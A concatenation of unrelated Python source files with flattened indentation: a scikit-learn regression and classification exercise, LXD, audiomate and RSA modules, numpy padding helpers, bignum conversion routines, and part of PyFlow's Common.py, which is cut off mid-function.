py | 1a32eb3a689ffa9039d678fb17a9c6fad2a74be1 | # Practical 1
# Load in the California house pricing data and unpack the features and labels
# Import a linear regression model from sklearn
# Fit the model
# Create a fake house's features and predict it's price
# Compute the score of the model on the training data
#%%
from sklearn import linear_model
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn import metrics
import numpy as np
#%%
# X, y = datasets.fetch_california_housing(return_X_y=True)
housing_data = datasets.fetch_california_housing()
X = housing_data.data
y = housing_data.target
print(X.shape)
print(y.shape)
print(housing_data.feature_names)
print(housing_data.DESCR)
#%%
model = linear_model.LinearRegression()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3) # test_size is a proportion of the data you are going to split
X_test, X_validation, y_test, y_validation = train_test_split(X_test, y_test, test_size=0.3) # test_size is a proportion of the data you are going to split
print(len(y))
print(f"num samples y_train: {len(y_train)}")
print(f"num samples y_test: {len(y_test)}")
print(f"num samples y_validation: {len(y_validation)}")
print(len(X))
print(f"num samples X_train: {len(X_train)}")
print(f"num samples X_test: {len(X_test)}")
print(f"num samples X_validation: {len(X_validation)}")
# %%
np.random.seed(2)
model.fit(X_train, y_train)
y_train_pred = model.predict(X_train)
y_validation_pred = model.predict(X_validation)
y_test_pred = model.predict(X_test)
train_loss = metrics.mean_squared_error(y_train, y_train_pred)
validation_loss = metrics.mean_squared_error(y_validation, y_validation_pred)
test_loss = metrics.mean_squared_error(y_test, y_test_pred)
train_score = model.score(X_train, y_train)
validation_score = model.score(X_validation, y_validation)
test_score = model.score(X_test, y_test)
print(
f"{model.__class__.__name__}: "
f"Train score: {train_score}"
f"Validation score: {validation_score}"
f"Test score: {test_score}"
)
#%%
X_fake_house = np.array([[ 6.92710000e+00, 1.90000000e+01, 5.53584906e+00,
9.89245283e-01, 1.72300000e+03, 3.63407547e+00,
2.98100000e+01, -1.37660000e+02]])
y_fake_house_pred = model.predict(X_fake_house)
print(y_fake_house_pred)
# %%
# # %%
# PRACTICAL: Access the sklearn parameters
# Fit a linear regression model to the California housing dataset
# Take a look at the docs, and figure out how to print the weights and bias that this model has learnt for the dataset
# Take a look at the docs for the dataset, and
# Discuss: what does this tell you about the importance of each feature?
print(model.coef_)
print(model.intercept_)
print(housing_data.feature_names)
# %%
# PRACTICAL: Visualise the sklearn parameters
# Take a single feature of the housing dataset
# Scatter plot it against the label in an X-Y graph
# Fit a model to that feature
# Plot your predictions on top (as a line, not a scatter)
# Discuss: what do you expect the weight and bias values to be?
# Access the weight and bias from the model and print them
# Were your expectations correct?
from sklearn.datasets import fetch_california_housing
california_housing = fetch_california_housing(as_frame=True)
california_housing.frame.head()
# %%
import matplotlib.pyplot as plt
california_housing.frame['MedInc'].describe()
california_housing.frame['MedHouseVal'].describe()
subset_df = california_housing.frame[['MedInc','MedHouseVal']]
import matplotlib.pyplot as plt
subset_df.hist(figsize=(12, 10), bins=30, edgecolor="black")
plt.subplots_adjust(hspace=0.7, wspace=0.4)
subset_df.plot(kind='scatter', x='MedInc', y='MedHouseVal', alpha=0.1)
# %%
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
model = LinearRegression()
X = subset_df[['MedInc']]
y = subset_df['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
print(model.coef_)
print(model.intercept_)
print(mean_squared_error(y, y_pred))
print(r2_score(X, y)) # Coeff of determination -1 is best score
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xticks(())
plt.yticks(())
plt.show()
# %%
# Draw the loss function
# Fit a linear regression model to predict the house prices from one column of the California house price dataset
# Access the weight and bias from the model
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
# Plot the loss agains the parameter value
# Discuss: does it look how you expect?
california_housing.frame.head()
california_housing.frame['AveRooms'].describe()
X = california_housing.frame[['AveRooms']]
y = california_housing.frame['MedHouseVal']
model.fit(X,y)
y_pred = model.predict(X)
weight = model.coef_
print(weight)
bias = model.intercept_
print(bias)
mse = mean_squared_error(y, y_pred)
print(mse)
r2_score = model.score(X, y)
print(r2_score)
plt.scatter(X, y, color="black", alpha=0.1)
plt.plot(X, y_pred, color="blue", linewidth=3)
plt.xlabel('AveRooms')
plt.ylabel('MedianHouseVal')
plt.show()
#%%
# One by one, set the models' weight parameter equal to the value in a range of values
# from 10 below and 10 above the found weight and calculate the mean square error
# (hint: there's an sklearn tool for computing the MSE)
MSE = []
weights = []
for i in range(-10,11):
new_weight = weight + i
weights.append(new_weight)
y_new_pred = new_weight * X + bias
mse = mean_squared_error(y, y_new_pred)
MSE.append(mse)
print(MSE)
print(weights)
plt.scatter(weights, MSE , color="black")
plt.xlabel('weights')
plt.ylabel('MSE')
plt.show()
# %%
weight_adjustment = range(-10,10)
# %%
# Practical - classification dataset
# Load in the breast cancer dataset from sklearn
# Find a classification model in sklearn
# Initialise the model
# Fit the model
# Get the score on the training data
# Print a prediction made by the fitted model
from sklearn import datasets
data = datasets.load_breast_cancer()
print(data.keys())
print(data.DESCR)
import pandas as pd
df = pd.DataFrame(data.data, columns=data.feature_names)
df['target'] = data.target
df.head()
df.info()
# %%
# Store the feature data
X = data.data
# store the target data
y = data.target
# split the data using Scikit-Learn's train_test_split
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y)
# %%
from sklearn.neighbors import KNeighborsClassifier
logreg = KNeighborsClassifier(n_neighbors=6)
logreg.fit(X_train, y_train)
logreg.score(X_test, y_test)
# %%
|
py | 1a32ebfc7dcf68df4512f6af8c1b2eca6ea4d456 | from codev.core.installer import Installer
from codev.core.providers.machines.lxd import LXDBaseMachine, LXDMachineSettings
from codev.control.isolation import PrivilegedIsolation
class LXDIsolationSettings(LXDMachineSettings):
@property
def distribution(self):
return self.data.get('distribution', 'ubuntu')
@property
def release(self):
return self.data.get('release', 'xenial')
class LXDIsolation(LXDBaseMachine, PrivilegedIsolation):
provider_name = 'lxd'
settings_class = LXDIsolationSettings
def create(self):
super().create()
# TODO - providers requirements
Installer(executor=self).install_packages(
'lxc',
'python3-pip', 'libffi-dev', 'libssl-dev', # for codev
'python-virtualenv', 'python-dev', 'python3-venv', 'sshpass', # for ansible task
'git', # for git source
'clsync', # for share support
)
self.stop()
self.start()
|
py | 1a32ec1275414457d517acbb0e5126b8f6fdd9ca | from audiomate import annotations
from audiomate.utils import textfile
WILDCARD_COMBINATION = ('**',)
class UnmappedLabelsException(Exception):
def __init__(self, message):
super(UnmappedLabelsException, self).__init__(message)
self.message = message
def relabel(label_list, projections):
"""
Relabel an entire :py:class:`~audiomate.annotations.LabelList` using user-defined projections.
Labels can be renamed, removed or overlapping labels can be flattened to a single label per segment.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` is is not
required to specify a projection for every single combination of labels.
This method raises a :py:class:`~audiomate.corpus.utils.labellist.UnmappedLabelsException` if a projection for one
or more combinations of labels is not defined.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
audiomate.annotations.LabelList: New label list with remapped labels
Raises:
UnmappedLabelsException: If a projection for one or more combinations of labels is not defined.
Example:
>>> projections = {
... ('a',): 'a',
... ('b',): 'b',
... ('c',): 'c',
... ('a', 'b',): 'a_b',
... ('a', 'b', 'c',): 'a_b_c',
... ('**',): 'b_c',
... }
>>> label_list = annotations.LabelList(labels=[
... annotations.Label('a', 3.2, 4.5),
... annotations.Label('b', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> ll = relabel(label_list, projections)
>>> [l.value for l in ll]
['a', 'a_b', 'a_b_c', 'b_c', 'c']
"""
unmapped_combinations = find_missing_projections(label_list, projections)
if len(unmapped_combinations) > 0:
raise UnmappedLabelsException('Unmapped combinations: {}'.format(unmapped_combinations))
new_labels = []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
label_mapping = projections[combination] if combination in projections else projections[WILDCARD_COMBINATION]
if label_mapping == '':
continue
new_labels.append(annotations.Label(label_mapping, labeled_segment[0], labeled_segment[1]))
return annotations.LabelList(idx=label_list.idx, labels=new_labels)
def find_missing_projections(label_list, projections):
"""
Finds all combinations of labels in `label_list` that are not covered by an entry in the dictionary of
`projections`. Returns a list containing tuples of uncovered label combinations or en empty list if there are none.
All uncovered label combinations are naturally sorted.
Each entry in the dictionary of projections represents a single projection that maps a combination of labels (key)
to a single new label (value). The combination of labels to be mapped is a tuple of naturally sorted labels that
apply to one or more segments simultaneously. By defining a special wildcard projection using `('**',)` is is not
required to specify a projection for every single combination of labels.
Args:
label_list (audiomate.annotations.LabelList): The label list to relabel
projections (dict): A dictionary that maps tuples of label combinations to string
labels.
Returns:
List: List of combinations of labels that are not covered by any projection
Example:
>>> ll = annotations.LabelList(labels=[
... annotations.Label('b', 3.2, 4.5),
... annotations.Label('a', 4.0, 4.9),
... annotations.Label('c', 4.2, 5.1)
... ])
>>> find_missing_projections(ll, {('b',): 'new_label'})
[('a', 'b'), ('a', 'b', 'c'), ('a', 'c'), ('c',)]
"""
unmapped_combinations = set()
if WILDCARD_COMBINATION in projections:
return []
for labeled_segment in label_list.ranges():
combination = tuple(sorted([label.value for label in labeled_segment[2]]))
if combination not in projections:
unmapped_combinations.add(combination)
return sorted(unmapped_combinations)
def load_projections(projections_file):
"""
Loads projections defined in the given `projections_file`.
The `projections_file` is expected to be in the following format::
old_label_1 | new_label_1
old_label_1 old_label_2 | new_label_2
old_label_3 |
You can define one projection per line. Each projection starts with a list of one or multiple
old labels (separated by a single whitespace) that are separated from the new label by a pipe
(`|`). In the code above, the segment labeled with `old_label_1` will be labeled with
`new_label_1` after applying the projection. Segments that are labeled with `old_label_1`
**and** `old_label_2` concurrently are relabeled to `new_label_2`. All segments labeled with
`old_label_3` are dropped. Combinations of multiple labels are automatically sorted in natural
order.
Args:
projections_file (str): Path to the file with projections
Returns:
dict: Dictionary where the keys are tuples of labels to project to the key's value
Example:
>>> load_projections('/path/to/projections.txt')
{('b',): 'foo', ('a', 'b'): 'a_b', ('a',): 'bar'}
"""
projections = {}
for parts in textfile.read_separated_lines_generator(projections_file, '|'):
combination = tuple(sorted([label.strip() for label in parts[0].split(' ')]))
new_label = parts[1].strip()
projections[combination] = new_label
return projections
|
py | 1a32ec4f01112308a575d6d8e75134b67b856048 | # -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
"""
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2016-03-26"
__version__ = '3.4.1'
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
|
py | 1a32ec989fe324d05c70cbf49f77ba7e9e7c8d69 | from .builder import build_positional_encoding, build_transformer
from .gaussian_target import gaussian_radius, gen_gaussian_target
from .positional_encoding import (LearnedPositionalEncoding,
SinePositionalEncoding)
from .res_layer import ResLayer, SimplifiedBasicBlock
from .transformer import (FFN, DynamicConv, MultiheadAttention, Transformer,
TransformerDecoder, TransformerDecoderLayer,
TransformerEncoder, TransformerEncoderLayer)
from .inverted_residual import InvertedResidual, InvertedResidualV3
from .make_divisible import make_divisible
__all__ = [
'ResLayer', 'gaussian_radius', 'gen_gaussian_target', 'MultiheadAttention',
'FFN', 'TransformerEncoderLayer', 'TransformerEncoder',
'TransformerDecoderLayer', 'TransformerDecoder', 'Transformer',
'build_transformer', 'build_positional_encoding', 'SinePositionalEncoding',
'LearnedPositionalEncoding', 'DynamicConv', 'SimplifiedBasicBlock',
'make_divisible', 'InvertedResidual'
]
|
py | 1a32ed5e10ea5fdd20b457ad31a38f74e5890bb7 | import numpy as np
def make_batches(size, batch_size):
nb_batch = int(np.ceil(size/float(batch_size)))
return [(i*batch_size, min(size, (i+1)*batch_size)) for i in range(0, nb_batch)] # zgwang: starting point of each batch
def pad_2d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
return pad_2d_vals(in_vals, size1, size2, dtype=dtype)
def pad_2d_vals(in_vals, dim1_size, dim2_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
cur_in_vals = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(cur_in_vals): cur_dim2_size = len(cur_in_vals)
out_val[i,:cur_dim2_size] = cur_in_vals[:cur_dim2_size]
return out_val
def pad_3d_vals_no_size(in_vals, dtype=np.int32):
size1 = len(in_vals)
size2 = np.max([len(x) for x in in_vals])
size3 = 0
for val in in_vals:
cur_size3 = np.max([len(x) for x in val])
if size3<cur_size3: size3 = cur_size3
return pad_3d_vals(in_vals, size1, size2, size3, dtype=dtype)
def pad_3d_vals(in_vals, dim1_size, dim2_size, dim3_size, dtype=np.int32):
# print(in_vals)
out_val = np.zeros((dim1_size, dim2_size, dim3_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
out_val[i, j, :cur_dim3_size] = in_vals_ij[:cur_dim3_size]
return out_val
def pad_4d_vals(in_vals, dim1_size, dim2_size, dim3_size, dim4_size, dtype=np.int32):
out_val = np.zeros((dim1_size, dim2_size, dim3_size, dim4_size), dtype=dtype)
if dim1_size > len(in_vals): dim1_size = len(in_vals)
for i in range(dim1_size):
in_vals_i = in_vals[i]
cur_dim2_size = dim2_size
if cur_dim2_size > len(in_vals_i): cur_dim2_size = len(in_vals_i)
for j in range(cur_dim2_size):
in_vals_ij = in_vals_i[j]
cur_dim3_size = dim3_size
if cur_dim3_size > len(in_vals_ij): cur_dim3_size = len(in_vals_ij)
for k in range(cur_dim3_size):
in_vals_ijk = in_vals_ij[k]
cur_dim4_size = dim4_size
if cur_dim4_size > len(in_vals_ijk): cur_dim4_size = len(in_vals_ijk)
out_val[i, j, k, :cur_dim4_size] = in_vals_ijk[:cur_dim4_size]
return out_val
def pad_target_labels(in_val, max_length, dtype=np.float32):
batch_size = len(in_val)
out_val = np.zeros((batch_size, max_length), dtype=dtype)
for i in range(batch_size):
for index in in_val[i]:
out_val[i,index] = 1.0
return out_val
|
py | 1a32ed6014607c0b6e5860a6bbca0898386d5c7b | #
#
# bignum.py
#
# This file is copied from python-filbitlib.
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
"""Bignum routines"""
from __future__ import absolute_import, division, print_function, unicode_literals
import struct
# generic big endian MPI format
def bn_bytes(v, have_ext=False):
ext = 0
if have_ext:
ext = 1
return ((v.bit_length()+7)//8) + ext
def bn2bin(v):
s = bytearray()
i = bn_bytes(v)
while i > 0:
s.append((v >> ((i-1) * 8)) & 0xff)
i -= 1
return s
def bin2bn(s):
l = 0
for ch in s:
l = (l << 8) | ch
return l
def bn2mpi(v):
have_ext = False
if v.bit_length() > 0:
have_ext = (v.bit_length() & 0x07) == 0
neg = False
if v < 0:
neg = True
v = -v
s = struct.pack(b">I", bn_bytes(v, have_ext))
ext = bytearray()
if have_ext:
ext.append(0)
v_bin = bn2bin(v)
if neg:
if have_ext:
ext[0] |= 0x80
else:
v_bin[0] |= 0x80
return s + ext + v_bin
def mpi2bn(s):
if len(s) < 4:
return None
s_size = bytes(s[:4])
v_len = struct.unpack(b">I", s_size)[0]
if len(s) != (v_len + 4):
return None
if v_len == 0:
return 0
v_str = bytearray(s[4:])
neg = False
i = v_str[0]
if i & 0x80:
neg = True
i &= ~0x80
v_str[0] = i
v = bin2bn(v_str)
if neg:
return -v
return v
# filbit-specific little endian format, with implicit size
def mpi2vch(s):
r = s[4:] # strip size
r = r[::-1] # reverse string, converting BE->LE
return r
def bn2vch(v):
return bytes(mpi2vch(bn2mpi(v)))
def vch2mpi(s):
r = struct.pack(b">I", len(s)) # size
r += s[::-1] # reverse string, converting LE->BE
return r
def vch2bn(s):
return mpi2bn(vch2mpi(s))
|
py | 1a32ed7567f5969792978c0f844fc312aa7a7126 | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""
.. sidebar:: **Common.py**
**Common.py** is a common definitions file. This file is imported in almost all others files of the program
"""
import re
import math
import time
import inspect
import struct
import weakref
try:
from queue import Queue
except:
from Queue import Queue
import uuid
import sys
from nine import IS_PYTHON2, str
if IS_PYTHON2:
from aenum import IntEnum, Flag, auto, Enum
else:
from enum import IntEnum, Flag, auto, Enum
from PyFlow import findPinClassByType
from PyFlow.Core.version import Version
maxint = 2 ** (struct.Struct('i').size * 8 - 1) - 1
FLOAT_RANGE_MIN = 0.1 + (-maxint - 1.0)
FLOAT_RANGE_MAX = maxint + 0.1
INT_RANGE_MIN = -maxint + 0
INT_RANGE_MAX = maxint + 0
DEFAULT_IN_EXEC_NAME = str('inExec')
DEFAULT_OUT_EXEC_NAME = str('outExec')
DEFAULT_WIDGET_VARIANT = str('DefaultWidget')
REF = str('Reference')
def lerp(start, end, alpha):
"""Performs a linear interpolation
>>> start + alpha * (end - start)
:param start: start the value to interpolate from
:param end: end the value to interpolate to
:param alpha: alpha how far to interpolate
:returns: The result of the linear interpolation
"""
return (start + alpha * (end - start))
def GetRangePct(MinValue, MaxValue, Value):
"""Calculates the percentage along a line from **MinValue** to **MaxValue** that value is.
:param MinValue: Minimum Value
:param MaxValue: Maximum Value
:param Value: Input value
:returns: The percentage (from 0.0 to 1.0) between the two values where input value is
"""
return (Value - MinValue) / (MaxValue - MinValue)
def mapRangeClamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)
"""
ClampedPct = clamp(GetRangePct(InRangeA, InRangeB, Value), 0.0, 1.0)
return lerp(OutRangeA, OutRangeB, ClampedPct)
def mapRangeUnclamped(Value, InRangeA, InRangeB, OutRangeA, OutRangeB):
"""Returns Value mapped from one range into another where the Value is clamped to the Input Range.
(e.g. 0.5 normalized from the range 0->1 to 0->50 would result in 25)"""
return lerp(OutRangeA, OutRangeB, GetRangePct(InRangeA, InRangeB, Value))
def sign(x):
"""Returns sign of x. -1 if x is negative, 1 if positive and zero if 0.
>>> x and (1, -1)[x < 0]
"""
return x and (1, -1)[x < 0]
def currentProcessorTime():
if IS_PYTHON2:
return time.clock()
else:
return time.process_time()
def clamp(n, vmin, vmax):
"""Computes the value of the first specified argument clamped to a range defined by the second and third specified arguments
:param n: input Value
:param vmin: MiniMum Value
:param vmax: Maximum Value
:returns: The clamped value of n
"""
return max(min(n, vmax), vmin)
def roundup(x, to):
"""Rounding up to sertain value
>>> roundup(7, 8)
>>> 8
>>> roundup(8, 8)
>>> 8
>>> roundup(9, 8)
>>> 16
:param x: value to round
:param to: value x will be rounded to
:returns: rounded value of x
:rtype: int
"""
return int(math.ceil(x / to)) * to
_currentVersion = Version(sys.version_info.major, sys.version_info.minor, 0)
python32 = Version(3, 2, 0)
if _currentVersion <= python32:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
del list[:]
else:
def clearList(list):
"""Clears python list
:param list: list to clear
:type list: list
:returns: cleared List
:rtype: list
"""
list.clear()
def findGoodId(ids):
"""
Finds good minimum unique int from iterable. Starting from 1
:param ids: a collection of occupied ids
:type ids: list|set|tuple
:returns: Unique Id
:rtype: int
"""
if len(ids) == 0:
return 1
ids = sorted(set(ids))
lastID = min(ids)
if lastID > 1:
return 1
for ID in ids:
diff = ID - lastID
if diff > 1:
return lastID + 1
break
lastID = ID
else:
return ID + 1
def wrapStringToFunctionDef(functionName, scriptString, kwargs=None):
"""Generates function string which then can be compiled and executed
Example:
::
wrapStringToFunctionDef('test', 'print(a)', {'a': 5})
Will produce following function:
::
def test(a=5):
print(a)
"""
kwargsString = ""
if kwargs is not None:
for argname, argValue in kwargs.items():
if isinstance(argValue, str):
argValue = "'{}'".format(argValue)
kwargsString += "{0}={1}, ".format(argname, argValue)
kwargsString = kwargsString[:-2]
result = "def {0}({1}):\n".format(functionName, kwargsString)
for scriptLine in scriptString.split('\n'):
result += "\t{}".format(scriptLine)
result += '\n'
return result
def cycleCheck(src, dst):
"""Check for cycle connected nodes
:param src: hand side pin
:type src: :class:`PyFlow.Core.PinBase`
:param dst: hand side pin
:type dst: :class:`PyFlow.Core.PinBase`
:returns: True if cycle deleted
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
start = src
if src in dst.affects:
return True
for i in dst.affects:
if cycleCheck(start, i):
return True
return False
def arePinsConnected(src, dst):
"""Checks if two pins are connected
.. note:: Pins can be passed in any order if **src** pin is :py:class:`PyFlow.Core.Common.PinDirection`, they will be swapped
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase`
:returns: True if Pins are connected
:rtype: bool
"""
if src.direction == dst.direction:
return False
if src.owningNode() == dst.owningNode():
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if dst in src.affects and src in dst.affected_by:
return True
return False
def getConnectedPins(pin):
"""Find all connected Pins to input Pin
:param pin: Pin to search connected pins
:type pin: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: Set of connected pins
:rtype: set(:py:class:`PyFlow.Core.PinBase.PinBase`)
"""
result = set()
if pin.direction == PinDirection.Input:
for lhsPin in pin.affected_by:
result.add(lhsPin)
if pin.direction == PinDirection.Output:
for rhsPin in pin.affects:
result.add(rhsPin)
return result
def pinAffects(lhs, rhs):
"""This function for establish dependencies bitween pins
.. warning:: Used internally, users will hardly need this
:param lhs: First pin to connect
:type lhs: :py:class:`PyFlow.Core.PinBase.PinBase`
:param rhs: Second Pin to connect
:type rhs: :py:class:`PyFlow.Core.PinBase.PinBase`
"""
assert(lhs is not rhs), "pin can not affect itself"
lhs.affects.add(rhs)
rhs.affected_by.add(lhs)
def canConnectPins(src, dst):
"""**Very important fundamental function, it checks if connection between two pins is possible**
:param src: Source pin to connect
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: Destination pin to connect
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connection can be made, and False if connection is not possible
:rtype: bool
"""
if src is None or dst is None:
return False
if src.direction == dst.direction:
return False
if arePinsConnected(src, dst):
return False
if src.direction == PinDirection.Input:
src, dst = dst, src
if cycleCheck(src, dst):
return False
if src.isExec() and dst.isExec():
return True
if not src.isArray() and dst.isArray():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not src.canChangeStructure(dst._currStructure, []):
return False
if not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
if not src.canChangeStructure(dst._currStructure, [], selfCheck=False):
return False
if not src.isDict() and dst.isDict():
if dst.optionEnabled(PinOptions.SupportsOnlyArrays):
if not (src.canChangeStructure(dst._currStructure, []) or dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
return False
elif not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.optionEnabled(PinOptions.SupportsOnlyArrays) and not dst.canChangeStructure(src._currStructure, [], selfCheck=False):
return False
else:
DictElement = src.getDictElementNode([])
dictNode = dst.getDictNode([])
nodeFree = False
if dictNode:
nodeFree = dictNode.KeyType.checkFree([])
if DictElement:
if not DictElement.key.checkFree([]) and not nodeFree:
if dst._data.keyType != DictElement.key.dataType:
return False
if src.isArray() and not dst.isArray():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.ArraySupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if src.isDict() and not dst.isDict():
srcCanChangeStruct = src.canChangeStructure(dst._currStructure, [])
dstCanChangeStruct = dst.canChangeStructure(src._currStructure, [], selfCheck=False)
if not dst.optionEnabled(PinOptions.DictSupported) and not (srcCanChangeStruct or dstCanChangeStruct):
return False
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections) and dst.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections) and src.reconnectionPolicy == PinReconnectionPolicy.ForbidConnection:
return False
if src.owningNode().graph() is None or dst.owningNode().graph() is None:
return False
if src.owningNode().graph() is not dst.owningNode().graph():
return False
if src.isAny() and dst.isExec():
if src.dataType not in dst.supportedDataTypes():
return False
if src.isExec() and not dst.isExec():
return False
if not src.isExec() and dst.isExec():
return False
if src.IsValuePin() and dst.IsValuePin():
if src.dataType in dst.allowedDataTypes([], dst._supportedDataTypes) or dst.dataType in src.allowedDataTypes([], src._supportedDataTypes):
a = src.dataType == "AnyPin" and not src.canChangeTypeOnConnection([], src.optionEnabled(PinOptions.ChangeTypeOnConnection), [])
b = dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
c = not dst.canChangeTypeOnConnection([], dst.optionEnabled(PinOptions.ChangeTypeOnConnection), []) and not dst.optionEnabled(PinOptions.AllowAny)
if all([a, b or c]):
return False
if not src.isDict() and dst.supportOnlyDictElement([], dst.isDict()) and not (dst.checkFree([], selfCheck=False) and dst.canChangeStructure(src._currStructure, [], selfCheck=False)):
if not src.supportDictElement([], src.optionEnabled(PinOptions.DictElementSupported)) and dst.supportOnlyDictElement([], dst.isDict()):
return False
return True
else:
if src.dataType not in dst.supportedDataTypes():
return False
if all([src.dataType in list(dst.allowedDataTypes([], dst._defaultSupportedDataTypes, selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections), defaults=True)) + ["AnyPin"],
dst.checkFree([], selfCheck=dst.optionEnabled(PinOptions.AllowMultipleConnections))]):
return True
if all([dst.dataType in list(src.allowedDataTypes([], src._defaultSupportedDataTypes, defaults=True)) + ["AnyPin"],
src.checkFree([])]):
return True
return False
if src.owningNode == dst.owningNode:
return False
return True
def connectPins(src, dst):
"""**Connects two pins**
This are the rules how pins connect:
* Input value pins can have one output connection if :py:class:`PyFlow.Core.Common.PinOptions.AllowMultipleConnections` flag is disabled
* Output value pins can have any number of connections
* Input execs can have any number of connections
* Output execs can have only one connection
:param src: left hand side pin
:type src: :py:class:`PyFlow.Core.PinBase.PinBase`
:param dst: right hand side pin
:type dst: :py:class:`PyFlow.Core.PinBase.PinBase`
:returns: True if connected Successfully
:rtype: bool
"""
if src.direction == PinDirection.Input:
src, dst = dst, src
if not canConnectPins(src, dst):
return False
# input value pins can have one output connection if `AllowMultipleConnections` flag is disabled
# output value pins can have any number of connections
if src.IsValuePin() and dst.IsValuePin():
if dst.hasConnections():
if not dst.optionEnabled(PinOptions.AllowMultipleConnections):
dst.disconnectAll()
# input execs can have any number of connections
# output execs can have only one connection
if src.isExec() and dst.isExec():
if src.hasConnections():
if not src.optionEnabled(PinOptions.AllowMultipleConnections):
src.disconnectAll()
if src.isExec() and dst.isExec():
src.onExecute.connect(dst.call)
dst.aboutToConnect(src)
src.aboutToConnect(dst)
pinAffects(src, dst)
src.setDirty()
dst.setData(src.currentData())
dst.pinConnected(src)
src.pinConnected(dst)
push(dst)
return True
def connectPinsByIndexes(lhsNode=None, lhsOutPinIndex=0, rhsNode=None, rhsInPinIndex=0):
"""Connects pins regardless name.
This function uses pin locations on node. Top most pin have position index 1, pin below - 2 etc.
:param lhsNode: Left hand side node
:type lhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
:param lhsOutPinIndex: Out pin position on left hand side node
:type lhsOutPinIndex: int
:param rhsNode: Right hand side node
:type rhsNode: :class:`~PyFlow.Core.NodeBase.NodeBase`
:param rhsInPinIndex: Out pin position on right hand side node
:type rhsInPinIndex: int
"""
if lhsNode is None:
return False
if rhsNode is None:
return False
if lhsOutPinIndex not in lhsNode.orderedOutputs:
return False
if rhsInPinIndex not in rhsNode.orderedInputs:
return False
lhsPin = lhsNode.orderedOutputs[lhsOutPinIndex]
